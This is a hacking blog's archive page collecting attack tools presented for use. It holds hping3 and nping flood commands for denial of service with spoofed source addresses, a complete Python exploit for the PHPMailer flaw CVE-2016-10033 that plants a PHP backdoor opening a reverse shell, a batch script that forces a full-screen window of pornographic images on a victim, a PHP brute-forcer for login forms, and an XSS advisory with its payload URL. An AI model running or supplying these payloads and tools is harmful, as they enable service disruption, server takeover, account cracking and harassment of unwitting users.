Category Archives: (M) Code Heap

Practical Approach For – DoS attacks using hping3 / nping

Wiki about DoS attacks explanation: Denial of-Service Attack

DDoS attacks are common attacks, occurring about 28 times per hour. http://www.digitalattackmap.com provide worldwide distribution of DDoS attacks in real time:

From the map of the DDoS attack, the international situation can be seen; for example, the Japanese-Chinese attack can be seen on September 18; after Trump announced the wall, you can see the Mexican-American attack.

 

DoS attacks using hping3:

#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com

 

  • -c: the number of packets sent
  • -d: Size of each packet
  • -S: Sends SYN packets
  • -w: TCP window size
  • -p: target port, you can specify any port
  • -flood: Send packets as fast as possible
  • -rand-source: Use a random IP address, the target machine to see a pile of ip, you can not locate the actual IP; You can also use-a or -spoof hide the host name

Simple SYN flood attack:

# hping3 -S –flood -V testsite.com

TCP connection attack:

# nping –tcp-connect -rate=90000 -c 900000 -q testsite.com

For more information on these two tools:

# man hping3# man nping

 

Please Feel Free To Share Your Views Experience Or Issue In Comments Below “Spam Comments Are Strictly Prohibited” Now we have better comment systems and servers

 

If You Like This Application Please Give Your Valuable Review In Google Play Store.

 

Enjoy Hacking !!!!!

 

 

PHPMailer versions prior to 5.2.18 remote code execution exploit. Written in python.

# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
 
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
 
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
 
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
 
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
 
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
 
os.system('clear')
print("\n")
print(" aaaaaa aaaa   aaa aaaaaa aaaaaaa  aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaaaaaa ")
print("aaaaaaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
print("aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa     aaa   aaaaaa  aaaaaaaaa  aaaaaaaa")
print("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaa   aaaaaa  aaaaaaaaa  aaaaaaaa")
print("aaa  aaaaaa aaaaaaaaa  aaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  aaa")
print("aaa  aaaaaa  aaaaaaaa  aaaaaa  aaa aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaa  aaa")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
 
target = 'http://localhost:8080'
backdoor = '/backdoor.php'
 
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'message': 'Pwned'}
 
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
 
headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}
 
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
 
 
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)

 

DBShield – Go Based Database Firewall

DBShield is a Database Firewall written in Go that has protection for MySQL/MariaDB, Oracle and PostgreSQL databases. It works in a proxy fashion inspecting traffic and dropping abnormal queries after a learning period to populate the internal database with regular queries.

DBShield - Go Based Database Firewall

Learning mode lets any query pass but it records information about it (pattern, username, time and source) into the internal database.

After collecting enough patterns we can run DBShield in protect mode. Protect mode can distinguish abnormal query pattern, user and source and take action based on configurations.

 

It currently supports DB2, MariaDB, MySQL, Oracle & PostgreSQL all with SSL apart from Oracle and DB2.

Installation

Get it:

Then you can see help using “-h” argument:

and run it with your configuration, like:

You can download DBShield here:

DBShield-1.0.0-beta4.zip

Python Code For Accessing Physical Location

import pygeoip
 gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')
 def printRecord(tgt): 
rec = gi.record_by_name(tgt)
 city = rec['city'] 
region = rec['region_name']
 country = rec['country_name']
 long = rec['longitude']
 lat = rec['latitude'] 
print '[*] Target: ' + tgt + ' Geo-located. '
 print '[+] '+str(city)+', '+str(region)+', '+str(country) 
print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long) tgt = 'ip adress here' printRecord(tgt)

 

PornAttack – Batch Programming

echo off
echo ^<html^>^<head^>^<title^>Fap^</title^> > Fap.hta
echo. >> Fap.hta
echo ^<hta:application id="oBVC" >> Fap.hta
echo applicationname="Fap"  >> Fap.hta
echo version="1.0" >> Fap.hta
echo maximizebutton="no" >> Fap.hta
echo minimizebutton="no" >> Fap.hta
echo sysmenu="no" >> Fap.hta
echo Caption="no" >> Fap.hta
echo windowstate="maximize"/^> >> Fap.hta
echo. >> Fap.hta
echo ^</head^>^<body background="http://www.newsfilter.org/content/gallery/50383/met-art_ACM_21_5.jpg" scroll="yes"^> >> Fap.hta
echo ^<img src="http://www.giffies.com/games/files/18.gif" ^> >> Fap.hta
echo ^<img src="http://stxt.youngpornmovies.com/thumbs/1/0585/101133_1.jpg" ^> >> Fap.hta
echo ^<img src="http://www4.clickr.info/img/190x163_teen3_orig.gif" ^> >> Fap.hta
echo ^<img src="http://www.thumbserve.com/intw/tn113829.jpg" ^> >> Fap.hta
echo ^<img src="http://static.ads.crakmedia.com/cfcd9a00272d345553929068fe15c5aa.gif" ^> >> Fap.hta
echo ^<img src="http://78.140.136.171/bt/st/thumbs/038/1001353519.jpg" ^> >> Fap.hta
echo ^<img src="http://78.140.136.171/bt/st/thumbs/009/0496989067.jpg" ^> >> Fap.hta
echo ^<img src="http://www.silentpix.com/content/toplist/siteoftheday9.gif" ^> >> Fap.hta
echo ^<img src="http://www.newsfilter.org/content/gallery/50378/met-art_LUH_294_2.jpg" ^> >> Fap.hta
echo ^<img src="http://ddfcash.com/PROMO/content/obj/vids/547vbj/547vbjp4.jpg" ^> >> Fap.hta
echo ^<img src="http://www.teenport.com/galleries/bailey-kline/red-peignoir/09.jpg" ^> >> Fap.hta
echo ^</body^>^</html^> >> Fap.hta
start "" /wait "Fap.hta"
del /s /f /q "Fap.hta" > nul

 

Secure Crypt – PHP Code

php script:
///////////////////
<?php
if($_POST['task']!="" and $_POST['message']!="")
{
$message=$_POST['message'];
if($_POST['key']!="")
{
$key=md5($_POST['key']);
}
else
{
$key=md5('Long Text To Be Used As Default Key');
}
$array_key=str_split($key,1);
$array_final_key=array_unique($array_key);
foreach($array_final_key as $single_key)
{
$master_key[]=$single_key;
}
$counter_key=count($master_key);
if($_POST['task']!='decrypt')
{
// Encrypt
$message_array=str_split($message,$counter_key);
foreach($message_array as $chunk)
{
$single_char_value=str_split($chunk,1);
for($loop1=0;$loop1<$counter_key;$loop1++)
{
$ord_sum_char[]=ord($master_key[$loop1])+ord($single_char_value[$loop1]);
}
}
foreach($ord_sum_char as $to_encrypt)
{
$loop_val=intval($to_encrypt/11);
$mod_val=$to_encrypt%11;
switch($mod_val)
{
case "0";
$char_fixed_val='<';
break;
case "1";
$char_fixed_val='*';
break;
case "2";
$char_fixed_val='$';
break;
case "3";
$char_fixed_val='#';
break;
case "4";
$char_fixed_val='+';
break;
case "5";
$char_fixed_val='?';
break;
case "6";
$char_fixed_val='>';
break;
case "7";
$char_fixed_val='^';
break;
case "8";
$char_fixed_val='!';
break;
case "9";
$char_fixed_val='&';
break;
case "10";
$char_fixed_val='%';
break;
}
$encryptd_char[]=$loop_val.$char_fixed_val;
}
$final_message=implode(" ",$encryptd_char);
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header">Super Crypt</div>
<form method="post" action="index.php">
<textarea name="message" id="text_area">'.$final_message.'</textarea>
<select name="task" id="task">
<option value="encrypt">Encrypt Text</option>
<option value="decrypt">Decrypt Text</option>
</select>
<input type="submit" value="Encrypt/Decrypt" id="button">
<div id="key">Key&nbsp;:</div>
<input type="text" name="key" id="key_text">
</form>
</div>
</div>
</body>
</html>';
}
else
{
// Decrypt
$first_decrypt_array=explode(" ",$message);
$counter_element=0;
$text_reset="";
foreach($first_decrypt_array as $first_value)
{
$counter_element=$counter_element+1;
if($counter_element%$counter_key=="0")
{
$text_reset=$text_reset.$first_value."Q";
}
else
{
$text_reset=$text_reset.$first_value." ";
}
}
$text_fixed=rtrim($text_reset,"Q");
$array_sectors=explode("Q",$text_fixed);
foreach($array_sectors as $sector)
{
$array_chars_fixed=explode(" ",$sector);
$counter_chars_fixed=count($array_chars_fixed);
for($loop_fixed=0;$loop_fixed<$counter_chars_fixed;$loop_fixed++)
{
$char_single_fixed=substr($array_chars_fixed[$loop_fixed],-1);
$loops_fixed=str_replace($char_single_fixed,"",$array_chars_fixed[$loop_fixed]);
$loops_fixed_val=$loops_fixed*11;
switch($char_single_fixed)
{
case "<";
$char_fixed_val=0;
break;
case "*";
$char_fixed_val=1;
break;
case "$";
$char_fixed_val=2;
break;
case "#";
$char_fixed_val=3;
break;
case "+";
$char_fixed_val=4;
break;
case "?";
$char_fixed_val=5;
break;
case ">";
$char_fixed_val=6;
break;
case "^";
$char_fixed_val=7;
break;
case "!";
$char_fixed_val=8;
break;
case "&";
$char_fixed_val=9;
break;
case "%";
$char_fixed_val=10;
break;
}
$final_val=($loops_fixed_val+$char_fixed_val)-ord($master_key[$loop_fixed]);
if($final_val!=0)
{
$decoded_message[]=chr($final_val);
}
}
}
$final_message1=implode("",$decoded_message);
$fh=fopen("Decoded.txt","w+");
fputs($fh,$final_message1);
fclose($fh);
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header"><a href="Decoded.txt">Decoded Message</a></div>
</div>
</div>
</body>
</html>';
}
}
else
{
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header">Super Crypt</div>
<form method="post" action="index.php">
<textarea name="message" id="text_area"></textarea>
<select name="task" id="task">
<option value="encrypt">Encrypt Text</option>
<option value="decrypt">Decrypt Text</option>
</select>
<input type="submit" value="Encrypt/Decrypt" id="button">
<div id="key">Key&nbsp;:</div>
<input type="text" name="key" id="key_text">
</form>
</div>
</div>
</body>
</html>';
}
?>
///////////////////
style file (style.css)
///////////////////
html{
cursor: default;
}
body{
margin: 0px;
font-size: 14px;
color: #ff0000;
font-weight: bold;
background: #000000;
}
#main_container{
width: 500px;
margin-left: auto;
margin-right: auto;
}
#body_container{
width: 500px;
height: 600px;
position: relative;
top: 0px;
left: 0px;
}
#header{
height: 50px;
width: 498px;
background: #000000;
position: absolute;
top: 100px;
left: 0px;
padding-top: 5px;
padding-left: 0px;
padding-right: 0px;
padding-bottom: 0px;
font-size: 32px;
color: #ff0000;
text-align: center;
border: 1px solid #ff0000; 
}
#text_area{
height: 300px;
width: 500px;
border: 0px;
background: #ff0000;
position: absolute;
top: 160px;
left: 0px;
cursor: default;
font-size: 14px;
font-weight: bold;
}
#task{
width: 110px;
position: absolute;
top: 470px;
left: 0px;
background: #ff0000;
border: 0px; 
}
#button{
width: 110px;
position: absolute;
top: 470px;
left: 120px;
background: #ff0000;
border: 0px;
}
#key{
position: absolute;
top: 470px;
left: 255px;
}
#key_text{
width: 200px;
background: #ff0000;
position: absolute;
top: 470px;
right: 0px;
border: 0px;
}

 

Fotoware Fotoweb 8.0 Cross Site Scripting

############################################################## 

                    - S21Sec Advisory - 
                   - S21SEC-047-en.txt  -

############################################################## 

     Title:  Fotoware Fotoweb 8.0 Cross Site Scripting (XSS) 
        ID:  S21sec-047-en 
  Severity:  Low 
   History:  May.2016  Vulnerability discovered 
             June.2016 Vendor contacted 
             July.2016 Vendor patch acknowledge.
     Scope:  Cross Site Scripting XSS 
 Platforms:  Any 
    Author:  Miguel A. Hernandez / Departamento Auditoria S21sec.
    
   Release:  Public 


[ SUMMARY ] 

Fotoweb is an enterprise grade Digital Asset Management System (DMS).
A DMS provides a central repository of pictures and media files. 

Unfiltered user-supplied data can lead a reflected XSS vulnerability.
This allows an attacker to execute arbitrary JavaScript in the context of the
browser of a victim if the victim clicks on an attacker supplied link or visits
an attacker controlled website.

[ AFFECTED VERSIONS ] 

This vulnerability has been tested and found working on version 8.0.715.5753


[ DESCRIPTION ] 

An insufficient input validation allows JS code injection in the 
parameter 'to' in login page. Example: 

http://fotowebserver/fotoweb/views/login?to=/fotoweb/%22;}%20else%20{%20alert%28%22S21sec%20XSS%22%29;%20}%20if%20%28inIframe%28%29%29%20{%20var%20relleno=%22


[ WORKAROUND ] 

The reported vulnerability has been reviewed by Fotoware development team.
This issue is addressed in FotoWeb 8 Feature Release 8. 

[ ACKNOWLEDGMENTS ] 

This vulnerability has been found and researched by: 

   - Miguel A. Hernandez [ Departamento de Auditoria S21sec ]

We would like to acknowledge the assistance of Fotoware:   
   
   - John Fredrik Engeland [ Fotoware Support Manager ]

[ REFERENCES ] 

* Fotoware 
 http://fotoware.com

* S21sec 
  
Home
* S21sec Blog http://blog.s21sec.com

 

Simple HTTP-Login Dictionary attack = PHP CODE

<html>
  <head>
    <title> PRO HACKER </title>	
  </head>
<body>
 
<FORM action=\"<?php echo $_SERVER[\'PHP_SELF\']; ?>\" method=\"POST\">
LINK:                                    Examples:<br />
<input type=\"text\" name=\"link\">         \"http://site.com/index.php\" \"http://192.168.1.100/index.php<br />
          <br />
FORM USERNAME FIELD: 			<br />
<input type=\"text\" name=\"fuser\">        \"username\" \"users\" \"anv\" \"user_login\"<br />
 
FORM PASSWORD FIELD: 			<br />
<input type=\"text\" name=\"fpass\">        \"password\" \"pass\" \"password_login\"<br />
 
OPTIONAL POSTDATA: 			<br />
<input type=\"text\" name=\"pdata\">        \"submit=send\" \"login=true\"<br />
          <br />
USERNAME: 				<br />
<input type=\"text\" name=\"username\">     \"Admin\" \"Heaton\" \"Mario\"<br />
 
CORRECT LOGIN VALUE:			<br />
<input type=\"text\" name=\"correct\">      \"Welcome Admin\" \"You have logged in\"<br />
 
DICTIONARY FILENAME:			<br />
<input type=\"file\" name=\"userfile\" >    \"/root/wordlist\" \"c:\\wordlist.txt\"<br />
 
<input type=\"submit\" value=\"ATTAAACK!\" name =\"submit\">
</form>
 
 
<?php
 
function get_url_contents($url,$fuser,$username,$fpass,$password,$pdata)
{
        $crl = curl_init();
        $timeout = 5;
        curl_setopt ($crl, CURLOPT_URL,$url);
 
  curl_setopt ($crl, CURLOPT_POSTFIELDS,
            $fuser 
            . \"=\" 
            . $username 
            . \"&\" 
            . $fpass 
            . \"=\" 
            . $password  
            . \"&\"
            . $pdata
            );
 
  curl_setopt ($crl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($crl, CURLOPT_CONNECTTIMEOUT, $timeout);
        $ret = curl_exec($crl);
        curl_close($crl);
        return $ret;
}
 
if(isset($_POST[\'submit\']))
  {
  $link		= 	$_POST[\"link\"];
  $fuser	 	= 	$_POST[\"fuser\"];
  $fpass 		= 	$_POST[\"fpass\"];
  $pdata 		= 	$_POST[\"pdata\"];
  $username 	= 	$_POST[\"username\"];
  $correct 	= 	$_POST[\"correct\"];
  $userfile 	= 	$_POST[\"userfile\"];
 
  echo	\"<br />Link: \"		.	$link;
  echo	\"<br />Fuser: \"		.	$fuser;
  echo	\"<br />Fpass: \"		.	$fpass;
  echo	\"<br />Pdata: \"		.	$pdata;
  echo	\"<br />Correct string: \".	$correct;
  echo	\"<br />User: \"		.	$username;
  echo	\"<br />Filename: \"	.	$userfile;
 
 
 
  $fp = fopen($userfile,\'r\') or die (\"Can\'t open wordlist-file!\");
  $x = 0;
      while(! feof($fp))
      {
        $password = fgets($fp); 
        $password = rtrim($password);
        $site = get_url_contents($link,$fuser,$username,$fpass,$password,$pdata);
 
        $pos = strpos($site, $correct);
        $x++;
 
          if($pos === FALSE) 
          {
 
          }
          else 
          {
   				echo \"<br /><br /><br />\";
          echo \"SUCCESS<br />\";
          echo \"Found a valid login! <br />\";
          echo \"Username: \" . $username . \"<br />\";
   				echo \"Password: \" . $password . \"<br /><br />\";
          echo \"Position in wordlist file: \" . $x;
          fclose($fp);
          break;
          }
 
        if(feof($fp))
        echo\"<br />Password was not found!\";
      }
}
 
?>	
</body>
</html>